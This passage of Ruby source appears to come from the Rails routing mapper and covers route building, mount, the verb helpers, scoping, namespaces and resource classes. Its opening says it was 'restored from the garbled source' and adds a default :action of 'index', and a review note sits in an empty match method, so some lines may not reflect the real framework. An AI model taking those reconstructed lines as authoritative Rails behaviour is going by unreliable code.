    # Restored from the garbled source: default the :action segment to
    # "index" unless a requirement already constrains it.
    if path_params.include?(:action) && !@requirements.key?(:action)
      @defaults[:action] ||= "index"
    end

    @required_defaults = (split_options[:required_defaults] || []).map(&:first)
  end

  def make_route(name, precedence)
    route = Journey::Route.new(name,
                               application,
                               path,
                               conditions,
                               required_defaults,
                               defaults,
                               request_method,
                               precedence,
                               @internal)

    route
  end

  def application
    app(@blocks)
  end

  def path
    build_path @ast, requirements, @anchor
  end

  def conditions
    build_conditions @conditions, @set.request_class
  end

  # Keeps only conditions the request class can answer (public methods).
  def build_conditions(current_conditions, request_class)
    conditions = current_conditions.dup

    conditions.keep_if do |k, _|
      request_class.public_method_defined?(k)
    end
  end
  private :build_conditions

  def request_method
    @via.map { |x| Journey::Route.verb_matcher(x) }
  end
  private :request_method

  JOINED_SEPARATORS = SEPARATORS.join # :nodoc:

  def build_path(ast, requirements, anchor)
    pattern = Journey::Path::Pattern.new(ast, requirements, JOINED_SEPARATORS, anchor)

    # Find all the symbol nodes that are adjacent to literal nodes and alter
    # the regexp so that Journey will partition them into custom routes.
    ast.find_all { |node|
      next unless node.cat?

      if node.left.literal? && node.right.symbol?
        symbol = node.right
      elsif node.left.literal? && node.right.cat? && node.right.left.symbol?
        symbol = node.right.left
      elsif node.left.symbol? && node.right.literal?
        symbol = node.left
      elsif node.left.symbol? && node.right.cat? && node.right.left.literal?
        symbol = node.left
      else
        next
      end

      if symbol
        symbol.regexp = /(?:#{Regexp.union(symbol.regexp, '-')})+/
      end
    }

    pattern
  end
  private :build_path

  private
    def add_wildcard_options(options, formatted, path_ast)
      # Add a constraint for wildcard route to make it non-greedy and match the
      # optional format part of the route by default.
      if formatted != false
        path_ast.grep(Journey::Nodes::Star).each_with_object({}) { |node, hash|
          hash[node.name.to_sym] ||= /.+?/
        }.merge options
      else
        options
      end
    end

    def normalize_options!(options, path_params, modyoule)
      if path_params.include?(:controller)
        raise ArgumentError, ":controller segment is not allowed within a namespace block" if modyoule

        # Add a default constraint for :controller path segments that matches namespaced
        # controllers with default routes like :controller/:action/:id(.:format), e.g:
        # GET /admin/products/show/1
        # => { controller: 'admin/products', action: 'show', id: '1' }
        options[:controller] ||= /.+?/
      end

      if to.respond_to?(:action) || to.respond_to?(:call)
        options
      else
        to_endpoint = split_to to
        controller = to_endpoint[0] || default_controller
        action = to_endpoint[1] || default_action

        controller = add_controller_module(controller, modyoule)

        options.merge! check_controller_and_action(path_params, controller, action)
      end
    end

    # Partitions constraints into path requirements vs request conditions.
    def split_constraints(path_params, constraints)
      constraints.partition do |key, requirement|
        path_params.include?(key) || key == :controller
      end
    end

    def normalize_format(formatted)
      case formatted
      when true
        { requirements: { format: /.+/ },
          defaults: {} }
      when Regexp
        { requirements: { format: formatted },
          defaults: { format: nil } }
      when String
        { requirements: { format: Regexp.compile(formatted) },
          defaults: { format: formatted } }
      else
        { requirements: {}, defaults: {} }
      end
    end

    def verify_regexp_requirements(requirements)
      requirements.each do |requirement|
        if ANCHOR_CHARACTERS_REGEX.match?(requirement.source)
          raise ArgumentError, "Regexp anchor characters are not allowed in routing requirements: #{requirement.inspect}"
        end

        if requirement.multiline?
          raise ArgumentError, "Regexp multiline option is not allowed in routing requirements: #{requirement.inspect}"
        end
      end
    end

    def normalize_defaults(options)
      Hash[options.reject { |_, default| Regexp === default }]
    end

    # Picks the rack endpoint: a static dispatcher, a wrapped callable, a
    # constrained dispatcher, or a plain dispatcher.
    def app(blocks)
      if to.respond_to?(:action)
        Routing::RouteSet::StaticDispatcher.new to
      elsif to.respond_to?(:call)
        Constraints.new(to, blocks, Constraints::CALL)
      elsif blocks.any?
        Constraints.new(dispatcher(defaults.key?(:controller)), blocks, Constraints::SERVE)
      else
        dispatcher(defaults.key?(:controller))
      end
    end

    def check_controller_and_action(path_params, controller, action)
      hash = check_part(:controller, controller, path_params, {}) do |part|
        translate_controller(part) {
          message = "'#{part}' is not a supported controller name. This can lead to potential routing problems.".dup
          message << " See https://guides.rubyonrails.org/routing.html#specifying-a-controller-to-use"

          raise ArgumentError, message
        }
      end

      check_part(:action, action, path_params, hash) { |part|
        part.is_a?(Regexp) ? part : part.to_s
      }
    end

    def check_part(name, part, path_params, hash)
      if part
        hash[name] = yield(part)
      else
        unless path_params.include?(name)
          message = "Missing :#{name} key on routes definition, please check your routes."
          raise ArgumentError, message
        end
      end
      hash
    end

    def split_to(to)
      if /#/.match?(to)
        to.split("#")
      else
        []
      end
    end

    def add_controller_module(controller, modyoule)
      if modyoule && !controller.is_a?(Regexp)
        if %r{\A/}.match?(controller)
          controller[1..-1]
        else
          [modyoule, controller].compact.join("/")
        end
      else
        controller
      end
    end

    def translate_controller(controller)
      return controller if Regexp === controller
      return controller.to_s if controller =~ /\A[a-z_0-9][a-z_0-9\/]*\z/

      yield
    end

    def blocks(callable_constraint)
      unless callable_constraint.respond_to?(:call) || callable_constraint.respond_to?(:matches?)
        raise ArgumentError, "Invalid constraint: #{callable_constraint.inspect} must respond to :call or :matches?"
      end
      [callable_constraint]
    end

    def constraints(options, path_params)
      options.group_by do |key, option|
        if Regexp === option
          :constraints
        else
          if path_params.include?(key)
            :path_params
          else
            :required_defaults
          end
        end
      end
    end

    def dispatcher(raise_on_name_error)
      Routing::RouteSet::Dispatcher.new raise_on_name_error
    end
end
# Invokes Journey::Router::Utils.normalize_path and ensure that
# (:locale) becomes (/:locale) instead of /(:locale). Except
# for root cases, where the latter is the correct one.
def self.normalize_path(path)
  path = Journey::Router::Utils.normalize_path(path)
  # Move a slash preceding an optional group inside the group, unless the
  # whole path is a single optional group (the root case guarded below).
  path.gsub!(%r{/(\(+)/?}, '\1/') unless path =~ %r{^/\(+[^)]+\)$}
  path
end
# Like normalize_path, but produces a route-name-friendly identifier:
# the leading "/" is stripped and remaining slashes become underscores.
def self.normalize_name(name)
  normalized = normalize_path(name)
  normalized[1..-1].tr("/", "_")
end
module Base
# Matches a URL pattern to one or more routes.
#
# You should not use the +match+ method in your router
# without specifying an HTTP method.
#
# If you want to expose your action to both GET and POST, use:
#
# # sets :controller, :action and :id in params
# match ':controller/:action/:id', via: [:get, :post]
#
# Note that +:controller+, +:action+ and +:id+ are interpreted as URL
# query parameters and thus available through +params+ in an action.
#
# If you want to expose your action to GET, use +get+ in the router:
#
# Instead of:
#
# match ":controller/:action/:id"
#
# Do:
#
# get ":controller/:action/:id"
#
# Two of these symbols are special, +:controller+ maps to the controller
# and +:action+ to the controller's action. A pattern can also map
# wildcard segments (globs) to params:
#
# get 'songs/*category/:title', to: 'songs#show'
#
# # 'songs/rock/classic/stairway-to-heaven' sets
# # params[:category] = 'rock/classic'
# # params[:title] = 'stairway-to-heaven'
#
# To match a wildcard parameter, it must have a name assigned to it.
# Without a variable name to attach the glob parameter to, the route
# can't be parsed.
#
# When a pattern points to an internal route, the route's +:action+ and
# +:controller+ should be set in options or hash shorthand. Examples:
#
# match 'photos/:id' => 'photos#show', via: :get
# match 'photos/:id', to: 'photos#show', via: :get
# match 'photos/:id', controller: 'photos', action: 'show', via: :get
#
# A pattern can also point to a +Rack+ endpoint i.e. anything that
# responds to +call+:
#
# match 'photos/:id', to: -> (hash) { [200, {}, ["Coming soon"]] }, via: :get
# match 'photos/:id', to: PhotoRackApp, via: :get
# # Yes, controller actions are just rack endpoints
# match 'photos/:id', to: PhotosController.action(:show), via: :get
#
# Because requesting various HTTP verbs with a single action has security
# implications, you must either specify the actions in
# the via options or use one of the HttpHelpers[rdoc-ref:HttpHelpers]
# instead of +match+.
#
# === Options
#
# Any options not seen here are passed on as params with the URL.
#
# [:controller]
# The route's controller.
#
# [:action]
# The route's action.
#
# [:param]
# Overrides the default resource identifier +:id+ (name of the
# dynamic segment used to generate the routes).
# You can access that segment from your controller using
# <tt>params[<:param>]</tt>.
# In your router:
#
# resources :users, param: :name
#
# The +users+ resource here will have the following routes generated for it:
#
# GET /users(.:format)
# POST /users(.:format)
# GET /users/new(.:format)
# GET /users/:name/edit(.:format)
# GET /users/:name(.:format)
# PATCH/PUT /users/:name(.:format)
# DELETE /users/:name(.:format)
#
# You can override <tt>ActiveRecord::Base#to_param</tt> of a related
# model to construct a URL:
#
# class User < ActiveRecord::Base
# def to_param
# name
# end
# end
#
# user = User.find_by(name: 'Phusion')
# user_path(user) # => "/users/Phusion"
#
# [:path]
# The path prefix for the routes.
#
# [:module]
# The namespace for :controller.
#
# match 'path', to: 'c#a', module: 'sekret', controller: 'posts', via: :get
# # => Sekret::PostsController
#
# See <tt>Scoping#namespace</tt> for its scope equivalent.
#
# [:as]
# The name used to generate routing helpers.
#
# [:via]
# Allowed HTTP verb(s) for route.
#
# match 'path', to: 'c#a', via: :get
# match 'path', to: 'c#a', via: [:get, :post]
# match 'path', to: 'c#a', via: :all
#
# [:to]
# Points to a +Rack+ endpoint. Can be an object that responds to
# +call+ or a string representing a controller's action.
#
# match 'path', to: 'controller#action', via: :get
# match 'path', to: -> (env) { [200, {}, ["Success!"]] }, via: :get
# match 'path', to: RackApp, via: :get
#
# [:on]
# Shorthand for wrapping routes in a specific RESTful context. Valid
# values are +:member+, +:collection+, and +:new+. Only use within
# <tt>resource(s)</tt> block. For example:
#
# resource :bar do
# match 'foo', to: 'c#a', on: :member, via: [:get, :post]
# end
#
# Is equivalent to:
#
# resource :bar do
# member do
# match 'foo', to: 'c#a', via: [:get, :post]
# end
# end
#
# [:constraints]
# Constrains parameters with a hash of regular expressions
# or an object that responds to <tt>matches?</tt>. In addition, constraints
# other than path can also be specified with any object
# that responds to <tt>===</tt> (eg. String, Array, Range, etc.).
#
# match 'path/:id', constraints: { id: /[A-Z]\d{5}/ }, via: :get
#
# match 'json_only', constraints: { format: 'json' }, via: :get
#
# class Whitelist
# def matches?(request) request.remote_ip == '1.2.3.4' end
# end
# match 'path', to: 'c#a', constraints: Whitelist.new, via: :get
#
# See <tt>Scoping#constraints</tt> for more examples with its scope
# equivalent.
#
# [:defaults]
# Sets defaults for parameters
#
# # Sets params[:format] to 'jpg' by default
# match 'path', to: 'c#a', defaults: { format: 'jpg' }, via: :get
#
# See <tt>Scoping#defaults</tt> for its scope equivalent.
#
# [:anchor]
# Boolean to anchor a <tt>match</tt> pattern. Default is true. When set to
# false, the pattern matches any request prefixed with the given path.
#
# # Matches any request starting with 'path'
# match 'path', to: 'c#a', anchor: false, via: :get
#
# [:format]
# Allows you to specify the default value for optional +format+
# segment or disable it by supplying +false+.
def match(path, options = nil)
  # Intentionally empty. NOTE(review): the working implementation
  # appears to be Resources#match further down, which the Mapper mixes
  # in after this module — confirm module inclusion order.
end
# Mount a Rack-based application to be used within the application.
#
# mount SomeRackApp, at: "some_route"
#
# Alternatively:
#
# mount(SomeRackApp => "some_route")
#
# For options, see +match+, as +mount+ uses it internally.
#
# All mounted applications come with routing helpers to access them.
# These are named after the class specified, so for the above example
# the helper is either +some_rack_app_path+ or +some_rack_app_url+.
# To customize this helper's name, use the +:as+ option:
#
# mount(SomeRackApp => "some_route", as: "exciting")
#
# This will generate the +exciting_path+ and +exciting_url+ helpers
# which can be used to navigate to this mounted app.
def mount(app, options = nil)
  if options
    path = options.delete(:at)
  elsif Hash === app
    # Hash form: mount(SomeRackApp => "some_route"). The app is the
    # first key responding to +call+; its value is the mount path.
    options = app
    app, path = options.find { |k, _| k.respond_to?(:call) }
    options.delete(app) if app
  end
  raise ArgumentError, "A rack application must be specified" unless app.respond_to?(:call)
  raise ArgumentError, <<~MSG unless path
    Must be called with mount point
    mount SomeRackApp, at: "some_route"
    or
    mount(SomeRackApp => "some_route")
  MSG
  # Railtie-based apps (engines) additionally get a generated route
  # prefix helper via define_generate_prefix below.
  rails_app = rails_app? app
  options[:as] ||= app_name(app, rails_app)
  target_as = name_for_action(options[:as], path)
  options[:via] ||= :all
  # anchor: false so the app receives every request under the prefix;
  # format: false so the trailing (.:format) segment is not added.
  match(path, options.merge(to: app, anchor: false, format: false))
  define_generate_prefix(app, target_as) if rails_app
  self
end
# Sets the default URL options for the route set.
def default_url_options=(options)
  @set.default_url_options = options
end
# The alias lets the writer be invoked in DSL style:
#   default_url_options host: "example.com"
alias_method :default_url_options, :default_url_options=
# Evaluates +block+ in the mapper's context, wrapped in the given
# +scope+ options.
def with_default_scope(scope, &block)
  scope(scope) { instance_exec(&block) }
end
# Query if the following named route was already defined.
def has_named_route?(name)
  # Delegates to the route set's named-route collection.
  @set.named_routes.key? name
end
private
# True only for classes inheriting from Rails::Railtie (engines and
# applications); plain Rack apps and non-class endpoints return false.
def rails_app?(app)
  Class === app && app < Rails::Railtie
end
# Derives the default :as name for a mounted app: railties report their
# own railtie_name; other classes get their underscored class name with
# slashes flattened to underscores; anything else yields nil.
def app_name(app, rails_app)
  return app.railtie_name if rails_app

  if app.is_a?(Class)
    ActiveSupport::Inflector.underscore(app.name).tr("/", "_")
  end
end
# Teaches a mounted engine's route set how to compute its mount prefix
# (SCRIPT_NAME) from the host application's named route for the mount
# point.
def define_generate_prefix(app, name)
  _route = @set.named_routes.get name
  _routes = @set
  _url_helpers = @set.url_helpers
  # Generates the path prefix for the engine from the host's
  # "#{name}_path" helper, using only the segments that route needs.
  script_namer = ->(options) do
    prefix_options = options.slice(*_route.segment_keys)
    prefix_options[:relative_url_root] = "".freeze
    if options[:_recall]
      prefix_options.reverse_merge!(options[:_recall].slice(*_route.segment_keys))
    end
    # We must actually delete prefix segment keys to avoid passing them to next url_for.
    _route.segment_keys.each { |k| options.delete(k) }
    _url_helpers.send("#{name}_path", prefix_options)
  end
  app.routes.define_mounted_helper(name, script_namer)
  app.routes.extend Module.new {
    def optimize_routes_generation?; false; end
    # define_method (not def) so the block closes over +script_namer+.
    define_method :find_script_name do |options|
      if options.key? :script_name
        super(options)
      else
        script_namer.call(options)
      end
    end
  }
end
end
# Verb-specific shorthands for +match+; each pins the :via option to a
# single HTTP method.
module HttpHelpers
  # Define a route that only recognizes HTTP GET.
  # For supported arguments, see match[rdoc-ref:Base#match]
  #
  #   get 'bacon', to: 'food#bacon'
  def get(*args, &block)
    map_method(:get, args, &block)
  end

  # Define a route that only recognizes HTTP POST.
  # For supported arguments, see match[rdoc-ref:Base#match]
  #
  #   post 'bacon', to: 'food#bacon'
  def post(*args, &block)
    map_method(:post, args, &block)
  end

  # Define a route that only recognizes HTTP PATCH.
  # For supported arguments, see match[rdoc-ref:Base#match]
  #
  #   patch 'bacon', to: 'food#bacon'
  def patch(*args, &block)
    map_method(:patch, args, &block)
  end

  # Define a route that only recognizes HTTP PUT.
  # For supported arguments, see match[rdoc-ref:Base#match]
  #
  #   put 'bacon', to: 'food#bacon'
  def put(*args, &block)
    map_method(:put, args, &block)
  end

  # Define a route that only recognizes HTTP DELETE.
  # For supported arguments, see match[rdoc-ref:Base#match]
  #
  #   delete 'broccoli', to: 'food#broccoli'
  def delete(*args, &block)
    map_method(:delete, args, &block)
  end

  private
    # Shared implementation for the verb helpers above: forces :via to
    # the given HTTP method and delegates to +match+.
    def map_method(method, args, &block)
      options = args.extract_options!
      options[:via] = method
      match(*args, options, &block)
      self
    end
end
# You may wish to organize groups of controllers under a namespace.
# Most commonly, you might group a number of administrative controllers
# under an +admin+ namespace. You would place these controllers under
# the <tt>app/controllers/admin</tt> directory, and you can group them
# together in your router:
#
# namespace "admin" do
# resources :posts, :comments
# end
#
# This will create a number of routes for each of the posts and comments
# controller. For <tt>Admin::PostsController</tt>, Rails will create:
#
# GET /admin/posts
# GET /admin/posts/new
# POST /admin/posts
# GET /admin/posts/1
# GET /admin/posts/1/edit
# PATCH/PUT /admin/posts/1
# DELETE /admin/posts/1
#
# If you want to route /posts (without the prefix /admin) to
# <tt>Admin::PostsController</tt>, you could use
#
# scope module: "admin" do
# resources :posts
# end
#
# or, for a single case
#
# resources :posts, module: "admin"
#
# If you want to route /admin/posts to +PostsController+
# (without the <tt>Admin::</tt> module prefix), you could use
#
# scope "/admin" do
# resources :posts
# end
#
# or, for a single case
#
# resources :posts, path: "/admin/posts"
#
# In each of these cases, the named routes remain the same as if you did
# not use scope. In the last case, the following paths map to
# +PostsController+:
#
# GET /admin/posts
# GET /admin/posts/new
# POST /admin/posts
# GET /admin/posts/1
# GET /admin/posts/1/edit
# PATCH/PUT /admin/posts/1
# DELETE /admin/posts/1
module Scoping
# Scopes a set of routes to the given default options.
#
# Take the following route definition as an example:
#
# scope path: ":account_id", as: "account" do
# resources :projects
# end
#
# This generates helpers such as +account_projects_path+, just like +resources+ does.
# The difference here being that the routes generated are like /:account_id/projects,
# rather than /accounts/:account_id/projects.
#
# === Options
#
# Takes same options as <tt>Base#match</tt> and <tt>Resources#resources</tt>.
#
# # route /posts (without the prefix /admin) to <tt>Admin::PostsController</tt>
# scope module: "admin" do
# resources :posts
# end
#
# # prefix the posts resource's requests with '/admin'
# scope path: "/admin" do
# resources :posts
# end
#
# # prefix the routing helper name: +sekret_posts_path+ instead of +posts_path+
# scope as: "sekret" do
# resources :posts
# end
def scope(*args)
  options = args.extract_options!.dup
  scope = {}

  # Positional args become path segments: scope "admin", "v1" => "admin/v1".
  options[:path] = args.flatten.join("/") if args.any?
  options[:constraints] ||= {}

  unless nested_scope?
    options[:shallow_path] ||= options[:path] if options.key?(:path)
    options[:shallow_prefix] ||= options[:as] if options.key?(:as)
  end

  if options[:constraints].is_a?(Hash)
    # Literal String/Integer constraints on URL options double as defaults.
    defaults = options[:constraints].select do |k, v|
      URL_OPTIONS.include?(k) && (v.is_a?(String) || v.is_a?(Integer))
    end

    options[:defaults] = defaults.merge(options[:defaults] || {})
  else
    # Non-hash constraints (callable / matches?) act as a block constraint.
    block, options[:constraints] = options[:constraints], {}
  end

  if options.key?(:only) || options.key?(:except)
    scope[:action_options] = { only: options.delete(:only),
                               except: options.delete(:except) }
  end

  if options.key? :anchor
    raise ArgumentError, "anchor is ignored unless passed to `match`"
  end

  # Merge each recognized scope option with the enclosing scope. POISON
  # marks "not supplied", so explicit nil/false values still merge.
  @scope.options.each do |option|
    if option == :blocks
      value = block
    elsif option == :options
      value = options
    else
      value = options.delete(option) { POISON }
    end

    unless POISON == value
      scope[option] = send("merge_#{option}_scope", @scope[option], value)
    end
  end

  @scope = @scope.new scope
  yield
  self
ensure
  @scope = @scope.parent
end
POISON = Object.new # :nodoc:
# Scopes routes to a specific controller
#
# controller "food" do
# match "bacon", action: :bacon, via: :get
# end
def controller(controller)
  @scope = @scope.new(controller: controller)
  yield
ensure
  # Always restore the parent scope, even if the block raises.
  @scope = @scope.parent
end
# Scopes routes to a specific namespace. For example:
#
# namespace :admin do
# resources :posts
# end
#
# This generates the following routes:
#
# admin_posts GET /admin/posts(.:format) admin/posts#index
# admin_posts POST /admin/posts(.:format) admin/posts#create
# new_admin_post GET /admin/posts/new(.:format) admin/posts#new
# edit_admin_post GET /admin/posts/:id/edit(.:format) admin/posts#edit
# admin_post GET /admin/posts/:id(.:format) admin/posts#show
# admin_post PATCH/PUT /admin/posts/:id(.:format) admin/posts#update
# admin_post DELETE /admin/posts/:id(.:format) admin/posts#destroy
#
# === Options
#
# The +:path+, +:as+, +:module+, +:shallow_path+ and +:shallow_prefix+
# options all default to the name of the namespace.
#
# For options, see <tt>Base#match</tt>. For +:shallow_path+ option, see
# <tt>Resources#resources</tt>.
#
# # accessible through /sekret/posts rather than /admin/posts
# namespace :admin, path: "sekret" do
# resources :posts
# end
#
# # maps to <tt>Sekret::PostsController</tt> rather than <tt>Admin::PostsController</tt>
# namespace :admin, module: "sekret" do
# resources :posts
# end
#
# # generates +sekret_posts_path+ rather than +admin_posts_path+
# namespace :admin, as: "sekret" do
# resources :posts
# end
def namespace(path, options = {})
  path = path.to_s

  # Each namespaced option defaults to the namespace name itself,
  # unless explicitly overridden in +options+.
  defaults = {
    module: path,
    as: options.fetch(:as, path),
    shallow_path: options.fetch(:path, path),
    shallow_prefix: options.fetch(:as, path)
  }

  path_scope(options.delete(:path) { path }) do
    scope(defaults.merge!(options)) { yield }
  end
end
# === Parameter Restriction
# Allows you to constrain the nested routes based on a set of rules.
# For instance, in order to change the routes to allow for a dot character in the +id+ parameter:
#
# constraints(id: /\d+\.\d+/) do
# resources :posts
# end
#
# Now routes such as +/posts/1+ will no longer be valid, but +/posts/1.1+ will be.
# The +id+ parameter must match the constraint passed in for this example.
#
# You may use this to also restrict other parameters:
#
# resources :posts do
# constraints(post_id: /\d+\.\d+/) do
# resources :comments
# end
# end
#
# === Restricting based on IP
#
# Routes can also be constrained to an IP or a certain range of IP addresses:
#
# constraints(ip: /192\.168\.\d+\.\d+/) do
# resources :posts
# end
#
# Any user connecting from the 192.168.* range will be able to see this resource,
# whereas any user connecting outside of this range will be told there is no such route.
#
# === Dynamic request matching
#
# Requests to routes can be constrained based on specific criteria:
#
# constraints(-> (req) { req.env["HTTP_USER_AGENT"] =~ /iPhone/ }) do
# resources :iphones
# end
#
# You are able to move this logic out into a class if it is too complex for routes.
# This class must have a +matches?+ method defined on it which either returns +true+
# if the user should be given access to that route, or +false+ if the user should not.
#
# class Iphone
# def self.matches?(request)
# request.env["HTTP_USER_AGENT"] =~ /iPhone/
# end
# end
#
# An expected place for this code would be +lib/constraints+.
#
# This class is then used like this:
#
# constraints(Iphone) do
# resources :iphones
# end
def constraints(constraints = {})
  # Thin wrapper over +scope+ restricted to the :constraints option.
  scope(constraints: constraints) { yield }
end
# Allows you to set default parameters for a route, such as this:
# defaults id: 'home' do
# match 'scoped_pages/(:id)', to: 'pages#show'
# end
# Using this, the +:id+ parameter here will default to 'home'.
def defaults(defaults = {})
  # Merges the new defaults into the enclosing scope's defaults for the
  # duration of the block.
  @scope = @scope.new(defaults: merge_defaults_scope(@scope[:defaults], defaults))
  yield
ensure
  @scope = @scope.parent
end
private
# Path-like scopes concatenate parent/child and re-normalize the result.
def merge_path_scope(parent, child)
  Mapper.normalize_path("#{parent}/#{child}")
end

def merge_shallow_path_scope(parent, child)
  Mapper.normalize_path("#{parent}/#{child}")
end
# Helper-name scopes join parent and child with an underscore.
def merge_as_scope(parent, child)
  parent ? [parent, child].join("_") : child
end
# Shallow helper-name prefixes also join with an underscore.
def merge_shallow_prefix_scope(parent, child)
  return child unless parent
  "#{parent}_#{child}"
end
# Controller namespaces nest with a slash separator.
def merge_module_scope(parent, child)
  return child unless parent
  "#{parent}/#{child}"
end
# For these scopes the innermost (child) value simply replaces the
# parent's value.
def merge_controller_scope(parent, child)
  child
end

def merge_action_scope(parent, child)
  child
end

def merge_via_scope(parent, child)
  child
end

def merge_format_scope(parent, child)
  child
end
# Hash-valued scopes merge parent and child, with child keys winning.
def merge_path_names_scope(parent, child)
  merge_options_scope(parent, child)
end

def merge_constraints_scope(parent, child)
  merge_options_scope(parent, child)
end

def merge_defaults_scope(parent, child)
  merge_options_scope(parent, child)
end
# Block constraints accumulate: the child is appended to a copy of the
# parent's list (the parent array itself is never mutated).
def merge_blocks_scope(parent, child)
  merged = (parent || []).dup
  merged.push(child) if child
  merged
end
# Generic hash merge used by the hash-valued scope mergers; a missing
# parent is treated as an empty hash.
def merge_options_scope(parent, child)
  base = parent || {}
  base.merge(child)
end
# Shallowness is a plain boolean decided by the innermost declaration.
def merge_shallow_scope(parent, child)
  !!child
end
# The :to endpoint is never inherited; the child value always wins.
def merge_to_scope(parent, child)
  child
end
end
# Resource routing allows you to quickly declare all of the common routes
# for a given resourceful controller. Instead of declaring separate routes
# for your +index+, +show+, +new+, +edit+, +create+, +update+ and +destroy+
# actions, a resourceful route declares them in a single line of code:
#
# resources :photos
#
# Sometimes, you have a resource that clients always look up without
# referencing an ID. A common example, /profile always shows the profile of
# the currently logged in user. In this case, you can use a singular resource
# to map /profile (rather than /profile/:id) to the show action.
#
# resource :profile
#
# It's common to have resources that are logically children of other
# resources:
#
# resources :magazines do
# resources :ads
# end
#
# You may wish to organize groups of controllers under a namespace. Most
# commonly, you might group a number of administrative controllers under
# an +admin+ namespace. You would place these controllers under the
# <tt>app/controllers/admin</tt> directory, and you can group them together
# in your router:
#
# namespace "admin" do
# resources :posts, :comments
# end
#
# By default the +:id+ parameter doesn't accept dots. If you need to
# use dots as part of the +:id+ parameter add a constraint which
# overrides this restriction, e.g:
#
# resources :articles, id: /[^\/]+/
#
# This allows any character other than a slash as part of your +:id+.
#
module Resources
# CANONICAL_ACTIONS holds all actions that do not need a prefix or
# a path appended since they fit properly in their scope level.
# Valid values for the :on option of member/collection routes.
VALID_ON_OPTIONS = [:new, :collection, :member]
# Options that configure the resource itself rather than being passed
# through to the generated routes.
RESOURCE_OPTIONS = [:as, :controller, :path, :only, :except, :param, :concerns]
CANONICAL_ACTIONS = %w(index create new show update destroy)
# Value object describing one `resources` declaration: its name,
# controller, path, identifier param, and which actions it routes.
class Resource #:nodoc:
  attr_reader :controller, :path, :param

  def initialize(entities, api_only, shallow, options = {})
    @name = entities.to_s
    @path = (options[:path] || @name).to_s
    @controller = (options[:controller] || @name).to_s
    @as = options[:as]
    @param = (options[:param] || :id).to_sym
    @options = options
    @shallow = shallow
    @api_only = api_only
    @only = options.delete :only
    @except = options.delete :except
  end

  # API-only apps skip the HTML-form actions :new and :edit.
  def default_actions
    if @api_only
      [:index, :create, :show, :update, :destroy]
    else
      [:index, :create, :new, :show, :update, :destroy, :edit]
    end
  end

  # The actions actually routed, honoring :only / :except.
  def actions
    if @only
      Array(@only).map(&:to_sym)
    elsif @except
      default_actions - Array(@except).map(&:to_sym)
    else
      default_actions
    end
  end

  # The :as override, if given; otherwise the declared name.
  def name
    @as || @name
  end

  def plural
    @plural ||= name.to_s
  end

  def singular
    @singular ||= name.to_s.singularize
  end

  alias :member_name :singular

  # Checks for uncountable plurals, and appends "_index" if the plural
  # and singular form are the same.
  def collection_name
    singular == plural ? "#{plural}_index" : plural
  end

  def resource_scope
    controller
  end

  alias :collection_scope :path

  # Path fragment for member routes, e.g. "photos/:id".
  def member_scope
    "#{path}/:#{param}"
  end

  alias :shallow_scope :member_scope

  # Path fragment for the new action, e.g. "photos/new".
  def new_scope(new_path)
    "#{path}/#{new_path}"
  end

  # Param name used when this resource is a nesting parent, e.g. :photo_id.
  def nested_param
    :"#{singular}_#{param}"
  end

  # Path fragment used for nested children, e.g. "photos/:photo_id".
  def nested_scope
    "#{path}/:#{nested_param}"
  end

  def shallow?
    @shallow
  end

  def singleton?; false; end
end
# A `resource` (singular) declaration: routed without an :id segment,
# but served by the pluralized controller.
class SingletonResource < Resource #:nodoc:
  def initialize(entities, api_only, shallow, options)
    super
    # Clear @as before computing the controller default: +plural+
    # memoizes via +name+, which reads @as, so the controller must be
    # derived from the declared name rather than the :as override.
    @as = nil
    @controller = (options[:controller] || plural).to_s
    @as = options[:as]
  end

  def default_actions
    if @api_only
      [:show, :create, :update, :destroy]
    else
      [:show, :create, :update, :destroy, :new, :edit]
    end
  end

  def plural
    @plural ||= name.to_s.pluralize
  end

  def singular
    @singular ||= name.to_s
  end

  alias :member_name :singular
  alias :collection_name :singular

  # Singletons have no :id segment: member/nested scopes are the bare path.
  alias :member_scope :path
  alias :nested_scope :path

  def singleton?; true; end
end
# Overrides path segment names (e.g. new: "brand_new") for all
# resources declared in the current scope.
def resources_path_names(options)
  @scope[:path_names].merge!(options)
end
# Sometimes, you have a resource that clients always look up without
# referencing an ID. A common example, /profile always shows the
# profile of the currently logged in user. In this case, you can use
# a singular resource to map /profile (rather than /profile/:id) to
# the show action:
#
# resource :profile
#
# This creates six different routes in your application, all mapping to
# the +Profiles+ controller (note that the controller is named after
# the plural):
#
# GET /profile/new
# GET /profile
# GET /profile/edit
# PATCH/PUT /profile
# DELETE /profile
# POST /profile
#
# === Options
# Takes same options as resources[rdoc-ref:#resources]
def resource(*resources, &block)
  options = resources.extract_options!.dup

  # apply_common_behavior_for returns true when it has already recursed
  # (multiple names, :shallow, implicit nesting, or scope options).
  if apply_common_behavior_for(:resource, resources, options, &block)
    return self
  end

  with_scope_level(:resource) do
    options = apply_action_options options
    resource_scope(SingletonResource.new(resources.pop, api_only?, @scope[:shallow], options)) do
      yield if block_given?

      concerns(options[:concerns]) if options[:concerns]

      new do
        get :new
      end if parent_resource.actions.include?(:new)

      set_member_mappings_for_resource
      collection do
        post :create
      end if parent_resource.actions.include?(:create)
    end
  end

  self
end
# In Rails, a resourceful route provides a mapping between HTTP verbs
# and URLs and controller actions. By convention, each action also maps
# to particular CRUD operations in a database. A single entry in the
# routing file, such as
#
# resources :photos
#
# creates seven different routes in your application, all mapping to
# the +Photos+ controller:
#
# GET /photos
# GET /photos/new
# POST /photos
# GET /photos/:id
# GET /photos/:id/edit
# PATCH/PUT /photos/:id
# DELETE /photos/:id
#
# Resources can also be nested infinitely by using this block syntax:
#
# resources :photos do
# resources :comments
# end
#
# This generates the following comments routes:
#
# GET /photos/:photo_id/comments
# GET /photos/:photo_id/comments/new
# POST /photos/:photo_id/comments
# GET /photos/:photo_id/comments/:id
# GET /photos/:photo_id/comments/:id/edit
# PATCH/PUT /photos/:photo_id/comments/:id
# DELETE /photos/:photo_id/comments/:id
#
# === Options
# Takes same options as match[rdoc-ref:Base#match] as well as:
#
# [:path_names]
# Allows you to change the segment component of the +edit+ and +new+ actions.
# Actions not specified are not changed.
#
# resources :posts, path_names: { new: "brand_new" }
#
# The above example will now change /posts/new to /posts/brand_new.
#
# [:path]
# Allows you to change the path prefix for the resource.
#
# resources :posts, path: 'postings'
#
# The resource and all segments will now route to /postings instead of /posts.
#
# [:only]
# Only generate routes for the given actions.
#
# resources :cows, only: :show
# resources :cows, only: [:show, :index]
#
# [:except]
# Generate all routes except for the given actions.
#
# resources :cows, except: :show
# resources :cows, except: [:show, :index]
#
# [:shallow]
# Generates shallow routes for nested resource(s). When placed on a parent resource,
# generates shallow routes for all nested resources.
#
